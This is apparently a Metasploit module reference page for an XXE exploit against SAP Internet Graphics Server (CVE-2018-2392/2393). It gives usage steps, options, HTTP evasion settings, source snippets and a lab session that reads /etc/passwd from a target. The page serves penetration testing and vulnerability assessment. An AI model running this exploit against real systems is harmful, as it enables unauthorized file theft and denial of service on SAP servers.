SAP Internet Graphics Server (IGS) XMLCHART XXE - Metasploit


This page contains detailed information about how to use the auxiliary/admin/sap/sap_igs_xmlchart_xxe metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: SAP Internet Graphics Server (IGS) XMLCHART XXE
Module: auxiliary/admin/sap/sap_igs_xmlchart_xxe
Source code: modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb
Disclosure date: 2018-03-14
Last modification time: 2021-05-13 04:01:03 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888, 40080
List of CVEs: CVE-2018-2392, CVE-2018-2393

This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart. Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable SAP IGS server.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf auxiliary(sap_igs_xmlchart_xxe) > show targets
    ... a list of targets ...
msf auxiliary(sap_igs_xmlchart_xxe) > set TARGET target-id
msf auxiliary(sap_igs_xmlchart_xxe) > show options
    ... show and set options ...
msf auxiliary(sap_igs_xmlchart_xxe) > exploit

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base

Vulnerable Application

This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when submitting a POST request to the XMLCHART page to generate a new chart.

Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable SAP IGS server.

Application Background

The Internet Graphics Service (IGS) where it provides a way infrastructure to enable developers to display graphics in an internet browser with minimal effort. It has been integrated in several different SAP UI technologies where it provides a way for data from another SAP system or data source to be utilized to generate dynamic graphical or non-graphical output.

Installation Steps

Steps to install and update the SAP IGS server can be found online on this page. Additional information on configuring the IGS server can be found here. Finally information on administering the IGS server can be found here.

Once set up and configured, the instances will be vulnerable on the default HTTP port 40080.

Verification Steps

  1. Start msfconsole
  2. Do: workspace [WORKSPACE]
  3. Do: use auxiliary/admin/sap/sap_igs_xmlchart_xxe
  4. Do: set RHOSTS [IP]
  5. Do: set FILE [remote file name]
  6. Do: set action READ
  7. Do: check
  8. Verify that the check method correctly identifies if the target is vulnerable or not.
  9. Do: run
  10. Verify that the contents of the file you specified were returned.

Options

FILE

File to read from the remote server. Example: /etc/passwd

URIPATH

This is the path to the XMLCHART page of the SAP IGS server that is vulnerable to XXE. By default it is set to /XMLCHART, however it can be changed if the SAP IGS server was installed under a different path than the web root. For example if the SAP IGS server was installed to the /igs/ path under the web root, then this value would be set to /igs/XMLCHART.

Actions

   Name  Description
   ----  -----------
   READ  Remote file read
   DOS   Denial Of Service

Scenarios

Vulnerable SAP IGS release: 7.45 running on SUSE Linux Enterprise Server for SAP Applications 12 SP1

msf6 > workspace -a SAP_TEST
[*] Added workspace: SAP_TEST
[*] Workspace: SAP_TEST
msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set RHOSTS 172.16.30.29
RHOSTS => 172.16.30.29
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set action READ
action => READ
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set Proxies http:127.0.0.1:8080
Proxies => http:127.0.0.1:8080
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > options

Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FILE     /etc/passwd          no        File to read from the remote server
   Proxies  http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   172.16.30.29         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT    40080                yes       The target port (TCP)
   SSL      false                no        Negotiate SSL/TLS for outgoing connections
   URIPATH  /XMLCHART            yes       Path to the SAP IGS XMLCHART page from the web root
   VHOST                         no        HTTP server virtual host


Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read


msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > check
[+] 172.16.30.29:40080 - The target is vulnerable. 172.16.30.29 running OS: SUSE Linux Enterprise Server for SAP Applications 12 SP1 returned a response indicating that its XMLCHART page is vulnerable to XXE!
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > run
[*] Running module against 172.16.30.29

[+] File: /etc/passwd content from host: 172.16.30.29
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:108:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:104:107:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:105:109:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
puppet:x:103:106:Puppet daemon:/var/lib/puppet:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
admin:x:1000:100:admin:/home/admin:/bin/bash
j45adm:x:1001:1001:SAP System Administrator:/home/j45adm:/bin/csh
sybj45:x:1002:1001:SAP Database Administrator:/sybase/J45:/bin/csh
sapadm:x:1003:1001:SAP System Administrator:/home/sapadm:/bin/false
[+] File: /etc/passwd saved in: /Users/vladimir/.msf4/loot/20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > services
Services
========

host          port   proto  name  state  info
----          ----   -----  ----  -----  ----
172.16.30.29  40080  tcp    http  open   SAP Internet Graphics Server (IGS)

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > vulns

Vulnerabilities
===============

Timestamp                Host          Name                                             References
---------                ----          ----                                             ----------
2020-10-07 10:12:37 UTC  172.16.30.29  SAP Internet Graphics Server (IGS) XMLCHART XXE  CVE-2018-2392,CVE-2018-2393,URL-https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > loot

Loot
====

host          service  type              name         content     info                  path
----          -------  ----              ----         -------     ----                  ----
172.16.30.29           igs.xmlchart.xxe  /etc/passwd  text/plain  SAP IGS XMLCHART XXE  /Users/vladimir/.msf4/loot/01619fd331da98b5ac4d-20201007131238_SAP_TEST_172.16.30.29_igs.xmlchart.xxe_346716.txt

Go back to menu.

Msfconsole Usage

Here is how the admin/sap/sap_igs_xmlchart_xxe auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/sap/sap_igs_xmlchart_xxe

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show info

       Name: SAP Internet Graphics Server (IGS) XMLCHART XXE
     Module: auxiliary/admin/sap/sap_igs_xmlchart_xxe
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2018-03-14

Provided by:
  Yvan Genuer
  Vladimir Ivanov

Available actions:
  Name  Description
  ----  -----------
  DOS   Denial Of Service
  READ  Remote file read

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FILE     /etc/passwd      no        File to read from the remote server
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    40080            yes       The target port (TCP)
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  URIPATH  /XMLCHART        yes       Path to the SAP IGS XMLCHART page from the web root
  VHOST                     no        HTTP server virtual host

Description:
  This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE 
  vulnerabilities within the XMLCHART page of SAP Internet Graphics 
  Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. 
  These vulnerabilities occur due to a lack of appropriate validation 
  on the Extension HTML tag when submitting a POST request to the 
  XMLCHART page to generate a new chart. Successful exploitation will 
  allow unauthenticated remote attackers to read files from the server 
  as the user from which the IGS service is started, which will 
  typically be the SAP admin user. Alternatively attackers can also 
  abuse the XXE vulnerability to conduct a denial of service attack 
  against the vulnerable SAP IGS server.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-2392
  https://nvd.nist.gov/vuln/detail/CVE-2018-2393
  https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_IGS-The-vulnerable-forgotten-component.pdf

Module Options

This is a complete list of options available in the admin/sap/sap_igs_xmlchart_xxe auxiliary module:

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show options

Module options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   FILE     /etc/passwd      no        File to read from the remote server
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    40080            yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URIPATH  /XMLCHART        yes       Path to the SAP IGS XMLCHART page from the web root
   VHOST                     no        HTTP server virtual host

Auxiliary action:

   Name  Description
   ----  -----------
   READ  Remote file read

Advanced Options

Here is a complete list of advanced options supported by the admin/sap/sap_igs_xmlchart_xxe auxiliary module:

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show advanced

Module advanced options (auxiliary/admin/sap/sap_igs_xmlchart_xxe):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions

This is a list of all auxiliary actions that the admin/sap/sap_igs_xmlchart_xxe module can do:

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------
   DOS   Denial Of Service
   READ  Remote file read

Evasion Options

Here is the full list of possible evasion options supported by the admin/sap/sap_igs_xmlchart_xxe auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/sap/sap_igs_xmlchart_xxe) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>

Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>" error message:

164:	          'ctype' => "multipart/form-data; boundary=#{@post_data.bound}",
165:	          'data' => @post_data.to_s
166:	        }
167:	      )
168:	    rescue StandardError => e
169:	      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
170:	      vprint_error("Error #{e.class}: #{e}")
171:	      return -1
172:	    end
173:	
174:	    # Check first HTTP response

Error <E.CLASS>: <E>

Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:

165:	          'data' => @post_data.to_s
166:	        }
167:	      )
168:	    rescue StandardError => e
169:	      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
170:	      vprint_error("Error #{e.class}: #{e}")
171:	      return -1
172:	    end
173:	
174:	    # Check first HTTP response
175:	    if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)

Picture

Here is a relevant code snippet related to the "Picture" error message:

170:	      vprint_error("Error #{e.class}: #{e}")
171:	      return -1
172:	    end
173:	
174:	    # Check first HTTP response
175:	    if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)
176:	      return -2
177:	    end
178:	
179:	    if first_response.body.include?('Errors')
180:	      return -3

Errors

Here is a relevant code snippet related to the "Errors" error message:

174:	    # Check first HTTP response
175:	    if first_response.nil? || first_response.code != 200 || !(first_response.body.include?('Picture') && first_response.body.include?('Info')) || !first_response.body.match?(/ImageMap|Errors/)
176:	      return -2
177:	    end
178:	
179:	    if first_response.body.include?('Errors')
180:	      return -3
181:	    end
182:	
183:	    first_response
184:	  end

Failed to retrieve SAP IGS page: <SCHEMA><HOST>:<PORT><DOWNLOAD_LINK>

Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page: <SCHEMA><HOST>:<PORT><DOWNLOAD_LINK>" error message:

195:	            'uri' => normalize_uri(@download_link),
196:	            'method' => 'GET'
197:	          }
198:	        )
199:	      rescue StandardError => e
200:	        print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@download_link}")
201:	        vprint_error("Error #{e.class}: #{e}")
202:	        return -1 # Some exception was thrown whilst making the second HTTP request!
203:	      end
204:	
205:	      # Check second HTTP response

Error <E.CLASS>: <E>

Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:

196:	            'method' => 'GET'
197:	          }
198:	        )
199:	      rescue StandardError => e
200:	        print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@download_link}")
201:	        vprint_error("Error #{e.class}: #{e}")
202:	        return -1 # Some exception was thrown whilst making the second HTTP request!
203:	      end
204:	
205:	      # Check second HTTP response
206:	      if second_response.nil? || second_response.code != 200 || !second_response.body.include?('area shape=rect')

The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.

Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the first request and did not respond in the expected manner." error message:

225:	    # so that the module can check if the target is vulnerable or not.
226:	
227:	    # Get OS release information
228:	    check_response = send_first_request
229:	    if check_response == -1
230:	      Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231:	    elsif check_response == -2
232:	      Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233:	    else
234:	      if check_response == -3
235:	        vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")

The server sent a response but it was not in the expected format. The target is likely patched.

Here is a relevant code snippet related to the "The server sent a response but it was not in the expected format. The target is likely patched." error message:

227:	    # Get OS release information
228:	    check_response = send_first_request
229:	    if check_response == -1
230:	      Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231:	    elsif check_response == -2
232:	      Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233:	    else
234:	      if check_response == -3
235:	        vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")
236:	      else
237:	        result = analyze_first_response(check_response.body)

The SAP IGS server is vulnerable, but file: <OS_RELEASE_FILE> not found or not enough rights.

Here is a relevant code snippet related to the "The SAP IGS server is vulnerable, but file: <OS_RELEASE_FILE> not found or not enough rights." error message:

230:	      Exploit::CheckCode::Safe('The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
231:	    elsif check_response == -2
232:	      Exploit::CheckCode::Safe('The server sent a response but it was not in the expected format. The target is likely patched.')
233:	    else
234:	      if check_response == -3
235:	        vprint_status("The SAP IGS server is vulnerable, but file: #{os_release_file} not found or not enough rights.")
236:	      else
237:	        result = analyze_first_response(check_response.body)
238:	
239:	        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240:	        if result == -1 || result == -3

The server did not respond to the second request in the expected manner and is therefore safe

Here is a relevant code snippet related to the "The server did not respond to the second request in the expected manner and is therefore safe" error message:

236:	      else
237:	        result = analyze_first_response(check_response.body)
238:	
239:	        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240:	        if result == -1 || result == -3
241:	          Exploit::CheckCode::Safe('The server did not respond to the second request in the expected manner and is therefore safe')
242:	        elsif result == -2
243:	          Exploit::CheckCode::Unknown('Some connection error occurred and it was not possible to determine if the server is vulnerable or not')
244:	        end
245:	
246:	        if !@file_content.to_s.empty?

Some connection error occurred and it was not possible to determine if the server is vulnerable or not

Here is a relevant code snippet related to the "Some connection error occurred and it was not possible to determine if the server is vulnerable or not" error message:

238:	
239:	        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
240:	        if result == -1 || result == -3
241:	          Exploit::CheckCode::Safe('The server did not respond to the second request in the expected manner and is therefore safe')
242:	        elsif result == -2
243:	          Exploit::CheckCode::Unknown('Some connection error occurred and it was not possible to determine if the server is vulnerable or not')
244:	        end
245:	
246:	        if !@file_content.to_s.empty?
247:	          if (os_regex = @file_content.match(/^PRETTY_NAME.*=.*"(?<os>.*)"$/))
248:	            os_release = "OS: #{os_regex[:os]}"

<HOST> did not return the contents of the requested file, aka <OS_RELEASE_FILE>. This host is likely patched.

Here is a relevant code snippet related to the "<HOST> did not return the contents of the requested file, aka <OS_RELEASE_FILE>. This host is likely patched." error message:

246:	        if !@file_content.to_s.empty?
247:	          if (os_regex = @file_content.match(/^PRETTY_NAME.*=.*"(?<os>.*)"$/))
248:	            os_release = "OS: #{os_regex[:os]}"
249:	          end
250:	        else
251:	          return Exploit::CheckCode::Safe("#{@host} did not return the contents of the requested file, aka #{os_release_file}. This host is likely patched.")
252:	        end
253:	      end
254:	      # Make ident
255:	      if os_release != ''
256:	        ident = "SAP Internet Graphics Server (IGS); #{os_release}"

<HOST> returned a response indicating that its XMLCHART page is vulnerable to XXE!

Here is a relevant code snippet related to the "<HOST> returned a response indicating that its XMLCHART page is vulnerable to XXE!" error message:

272:	        refs: references,
273:	        info: os_release
274:	      )
275:	      # Print Vulnerability
276:	      if os_release == ''
277:	        Exploit::CheckCode::Vulnerable("#{@host} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
278:	      else
279:	        Exploit::CheckCode::Vulnerable("#{@host} running #{os_release} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
280:	      end
281:	    end
282:	  end

<HOST> running <OS_RELEASE> returned a response indicating that its XMLCHART page is vulnerable to XXE!

Here is a relevant code snippet related to the "<HOST> running <OS_RELEASE> returned a response indicating that its XMLCHART page is vulnerable to XXE!" error message:

274:	      )
275:	      # Print Vulnerability
276:	      if os_release == ''
277:	        Exploit::CheckCode::Vulnerable("#{@host} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
278:	      else
279:	        Exploit::CheckCode::Vulnerable("#{@host} running #{os_release} returned a response indicating that its XMLCHART page is vulnerable to XXE!")
280:	      end
281:	    end
282:	  end
283:	
284:	  def run

The action <ACTION.NAME> is not a supported action.

Here is a relevant code snippet related to the "The action <ACTION.NAME> is not a supported action." error message:

286:	    when 'READ'
287:	      action_file_read
288:	    when 'DOS'
289:	      action_dos
290:	    else
291:	      print_error("The action #{action.name} is not a supported action.")
292:	    end
293:	  end
294:	
295:	  def action_file_read
296:	    # Set up XML data for HTTP request

The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.

Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the first request and did not respond in the expected manner." error message:

298:	    make_post_data(@file, dos: false)
299:	
300:	    # Download remote file
301:	    first_response = send_first_request
302:	    if first_response == -1
303:	      fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
304:	    elsif first_response == -2
305:	      fail_with(Failure::UnexpectedReply, 'The server sent a response but it was not in the expected format. The target is likely patched.')
306:	    else
307:	      # Report Service and Vulnerability
308:	      report_service(

The server sent a response but it was not in the expected format. The target is likely patched.

Here is a relevant code snippet related to the "The server sent a response but it was not in the expected format. The target is likely patched." error message:

300:	    # Download remote file
301:	    first_response = send_first_request
302:	    if first_response == -1
303:	      fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the first request and did not respond in the expected manner.')
304:	    elsif first_response == -2
305:	      fail_with(Failure::UnexpectedReply, 'The server sent a response but it was not in the expected format. The target is likely patched.')
306:	    else
307:	      # Report Service and Vulnerability
308:	      report_service(
309:	        host: @host,
310:	        port: @port,

The SAP IGS server is vulnerable, but file: <FILE> not found or not enough rights.

Here is a relevant code snippet related to the "The SAP IGS server is vulnerable, but file: <FILE> not found or not enough rights." error message:

318:	        name: name,
319:	        refs: references
320:	      )
321:	      # Get remote file content
322:	      if first_response == -3
323:	        print_status("The SAP IGS server is vulnerable, but file: #{@file} not found or not enough rights.")
324:	      else
325:	        result = analyze_first_response(first_response.body)
326:	        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
327:	        if result == -1
328:	          fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')

The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.

Here is a relevant code snippet related to the "The server encountered an exception when trying to respond to the second request and did not respond in the expected manner." error message:

323:	        print_status("The SAP IGS server is vulnerable, but file: #{@file} not found or not enough rights.")
324:	      else
325:	        result = analyze_first_response(first_response.body)
326:	        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
327:	        if result == -1
328:	          fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
329:	        elsif result == -2
330:	          print_error('The server responded successfully but the response indicated the server is not vulnerable!')
331:	          return
332:	        elsif result == -3
333:	          print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')

The server responded successfully but the response indicated the server is not vulnerable!

Here is a relevant code snippet related to the "The server responded successfully but the response indicated the server is not vulnerable!" error message:

325:	        result = analyze_first_response(first_response.body)
326:	        # Handle all the odd cases where analyze_first_response may not return a success code, aka a return value of 0.
327:	        if result == -1
328:	          fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
329:	        elsif result == -2
330:	          print_error('The server responded successfully but the response indicated the server is not vulnerable!')
331:	          return
332:	        elsif result == -3
333:	          print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')
334:	          return
335:	        end

Here is a relevant code snippet related to the "The server responded successfully but no download link was found in the response, so it is not vulnerable!" error message:

328:	          fail_with(Failure::UnexpectedReply, 'The server encountered an exception when trying to respond to the second request and did not respond in the expected manner.')
329:	        elsif result == -2
330:	          print_error('The server responded successfully but the response indicated the server is not vulnerable!')
331:	          return
332:	        elsif result == -3
333:	          print_error('The server responded successfully but no download link was found in the response, so it is not vulnerable!')
334:	          return
335:	        end
336:	
337:	        if !@file_content.to_s.empty?
338:	          vprint_good("File: #{@file} content from host: #{@host}\n#{@file_content}")

Failed to get <FILE> content!

Here is a relevant code snippet related to the "Failed to get <FILE> content!" error message:

337:	        if !@file_content.to_s.empty?
338:	          vprint_good("File: #{@file} content from host: #{@host}\n#{@file_content}")
339:	          loot = store_loot('igs.xmlchart.xxe', 'text/plain', @host, @file_content, @file, 'SAP IGS XMLCHART XXE')
340:	          print_good("File: #{@file} saved in: #{loot}")
341:	        else
342:	          print_error("Failed to get #{@file} content!")
343:	        end
344:	
345:	      end
346:	    end
347:	  end

Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>

Here is a relevant code snippet related to the "Failed to retrieve SAP IGS page at <SCHEMA><HOST>:<PORT><PATH>" error message:

378:	        port: @port,
379:	        name: name,
380:	        refs: references
381:	      )
382:	    rescue StandardError => e
383:	      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
384:	      vprint_error("Error #{e.class}: #{e}")
385:	    end
386:	
387:	    # Check HTTP response
388:	    fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200

Error <E.CLASS>: <E>

Here is a relevant code snippet related to the "Error <E.CLASS>: <E>" error message:

379:	        name: name,
380:	        refs: references
381:	      )
382:	    rescue StandardError => e
383:	      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
384:	      vprint_error("Error #{e.class}: #{e}")
385:	    end
386:	
387:	    # Check HTTP response
388:	    fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200
389:	  end

The target responded with a 200 OK response code. The DoS attempt was unsuccessful.

Here is a relevant code snippet related to the "The target responded with a 200 OK response code. The DoS attempt was unsuccessful." error message:

381:	      )
382:	    rescue StandardError => e
383:	      print_error("Failed to retrieve SAP IGS page at #{@schema}#{@host}:#{@port}#{@path}")
384:	      vprint_error("Error #{e.class}: #{e}")
385:	    end
386:	
387:	    # Check HTTP response
388:	    fail_with(Failure::NotVulnerable, 'The target responded with a 200 OK response code. The DoS attempt was unsuccessful.') unless dos_response.code != 200
389:	  end
390:	
391:	end

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • Yvan Genuer
  • Vladimir Ivanov

Version

This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.